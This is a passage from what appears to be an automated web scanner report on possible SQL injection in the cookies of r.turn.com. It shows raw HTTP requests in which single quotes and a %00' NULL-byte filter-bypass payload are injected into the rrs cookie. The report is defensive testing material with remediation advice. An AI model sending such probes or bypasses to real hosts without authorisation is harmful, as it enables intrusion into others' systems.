alMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHs
yGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; 
pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr3
6hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138''; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:23 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:23 GMT


1.13. http://r.turn.com/r/beacon [rrs cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The rrs cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rrs cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHs
yGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; 
pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr3
6hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%00'; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
